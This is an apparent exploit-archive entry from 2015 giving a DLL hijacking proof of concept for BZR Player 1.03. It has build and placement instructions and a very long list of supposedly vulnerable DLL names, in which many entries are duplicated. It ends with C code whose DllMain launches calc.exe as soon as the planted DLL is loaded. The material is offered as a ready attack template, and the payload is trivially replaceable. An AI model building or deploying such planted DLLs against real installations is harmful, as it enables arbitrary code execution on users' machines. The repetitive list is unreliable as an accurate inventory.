BZR Player 1.03 - DLL Hijacking

/*

#[+] Author: TUNISIAN CYBER

#[+] Exploit Title: BZR Player 1.03 DLL Hijacking

#[+] Date: 29-03-2015

#[+] Type: Local Exploits

#[+] Vendor: http://bzrplayer.blazer.nu/

#[+] Tested on: WinXp/Windows 7 Pro

#[+] Friendly Sites: sec4ever.com

#[+] Twitter: @TCYB3R

#[+] gcc -shared -o [DLLNAME_choose one from the lis below].dll tcyber.c

# Copy it to the software dir. then execute the software , calc.exe will launch :).

#Vulnerable and Exploitable DLLs:

output_dsound.dll

codec_cdda.dll

output_writer_nrt.dll

output_nosound.dll

output_nosound_nrt.dll

codec_tag.dll

codec_cdda.dll

codec_fsb.dll

codec_vag.dll

codec_.dll

codec_oggvorbis.dll

codec_tremor.dll

codec_fsb.dll

codec_aiff.dll

codec_flac.dll

codec_mod.dll

codec_s3m.dll

codec_xm.dll

codec_it.dll

codec_midi.dll

codec_dls.dll

codec_sf2.dll

codec_asf.dll

codec_vag.dll

codec_playlist.dll

codec_mpeg.dll

dsp_oscillator.dll

dsp_fft.dll

dsp_lowpass.dll

dsp_lowpass2.dll

dsp_lowpass_simple.dll

dsp_highpass.dll

dsp_echo.dll

dsp_delay.dll

codec_.dll

dsp_flange.dll

dsp_tremolo.dll

dsp_distortion.dll

dsp_normalize.dll

dsp_parameq.dll

dsp_pitchshift.dll

dsp_chorus.dll

dsp_reverb.dll

dsp_sfxreverb.dll

dsp_itecho.dll

codec_oggvorbis.dll

dsp_compressor.dll

dsp_dolbyheadphones.dll

output_dsound.dll

output_winmm.dll

output_wasapi.dll

output_asio.dll

output_writer.dll

output_writer_nrt.dll

output_nosound.dll

output_nosound_nrt.dll

codec_tremor.dll

codec_tag.dll

codec_cdda.dll

codec_fsb.dll

codec_vag.dll

codec_.dll

codec_oggvorbis.dll

codec_tremor.dll

codec_aiff.dll

codec_flac.dll

codec_mod.dll

codec_aiff.dll

codec_s3m.dll

codec_xm.dll

codec_it.dll

codec_midi.dll

codec_dls.dll

codec_sf2.dll

codec_asf.dll

codec_playlist.dll

codec_mpeg.dll

dsp_oscillator.dll

codec_flac.dll

dsp_fft.dll

dsp_lowpass.dll

dsp_lowpass2.dll

dsp_lowpass_simple.dll

dsp_highpass.dll

dsp_echo.dll

dsp_delay.dll

dsp_flange.dll

dsp_tremolo.dll

dsp_distortion.dll

codec_mod.dll

dsp_normalize.dll

dsp_parameq.dll

dsp_pitchshift.dll

dsp_chorus.dll

dsp_reverb.dll

dsp_sfxreverb.dll

dsp_itecho.dll

dsp_compressor.dll

dsp_dolbyheadphones.dll

output_dsound.dll

codec_s3m.dll

output_winmm.dll

output_wasapi.dll

output_asio.dll

output_writer.dll

output_writer_nrt.dll

output_nosound.dll

output_nosound_nrt.dll

codec_tag.dll

codec_cdda.dll

codec_fsb.dll

output_winmm.dll

codec_xm.dll

codec_vag.dll

codec_.dll

codec_oggvorbis.dll

codec_tremor.dll

codec_aiff.dll

codec_flac.dll

codec_mod.dll

codec_s3m.dll

codec_xm.dll

codec_it.dll

codec_midi.dll

codec_dls.dll

codec_sf2.dll

codec_asf.dll

codec_playlist.dll

codec_mpeg.dll

dsp_oscillator.dll

dsp_fft.dll

dsp_lowpass.dll

dsp_lowpass2.dll

codec_midi.dll

dsp_lowpass_simple.dll

dsp_highpass.dll

dsp_echo.dll

dsp_delay.dll

dsp_flange.dll

dsp_tremolo.dll

dsp_distortion.dll

dsp_normalize.dll

dsp_parameq.dll

dsp_pitchshift.dll

codec_dls.dll

dsp_chorus.dll

dsp_reverb.dll

dsp_sfxreverb.dll

dsp_itecho.dll

dsp_compressor.dll

dsp_dolbyheadphones.dll

codec_sf2.dll

codec_asf.dll

codec_playlist.dll

codec_mpeg.dll

dsp_oscillator.dll

dsp_fft.dll

output_wasapi.dll

dsp_lowpass.dll

dsp_lowpass2.dll

dsp_lowpass_simple.dll

dsp_highpass.dll

dsp_echo.dll

dsp_delay.dll

dsp_flange.dll

dsp_tremolo.dll

dsp_distortion.dll

dsp_normalize.dll

output_asio.dll

dsp_parameq.dll

dsp_pitchshift.dll

dsp_chorus.dll

dsp_reverb.dll

dsp_sfxreverb.dll

dsp_itecho.dll

dsp_compressor.dll

dsp_dolbyheadphones.dll

output_dsound.dll

output_winmm.dll

output_writer.dll

output_wasapi.dll

output_asio.dll

output_writer.dll

output_writer_nrt.dll

output_nosound.dll

output_nosound_nrt.dll

codec_tag.dll

codec_cdda.dll

codec_fsb.dll

codec_vag.dll

output_writer_nrt.dll

codec_.dll

codec_oggvorbis.dll

codec_tremor.dll

codec_aiff.dll

codec_flac.dll

codec_mod.dll

codec_s3m.dll

codec_xm.dll

codec_it.dll

codec_midi.dll

output_nosound.dll

codec_dls.dll

codec_sf2.dll

codec_asf.dll

codec_playlist.dll

codec_mpeg.dll

dsp_oscillator.dll

dsp_fft.dll

dsp_lowpass.dll

dsp_lowpass2.dll

dsp_lowpass_simple.dll

output_nosound_nrt.dll

dsp_highpass.dll

dsp_echo.dll

dsp_delay.dll

dsp_flange.dll

dsp_tremolo.dll

dsp_distortion.dll

dsp_normalize.dll

dsp_parameq.dll

dsp_pitchshift.dll

dsp_chorus.dll

codec_tag.dll

dsp_reverb.dll

dsp_sfxreverb.dll

dsp_itecho.dll

dsp_compressor.dll

dsp_dolbyheadphones.dll

output_dsound.dll

output_winmm.dll

output_wasapi.dll

output_asio.dll

output_writer.dll

#Proof of Concept (PoC):

=======================

*/

#include <windows.h>

int tunisian()

{

WinExec("calc", 0);

exit(0);

return 0;

}

BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)

{

tunisian();

return 0;

}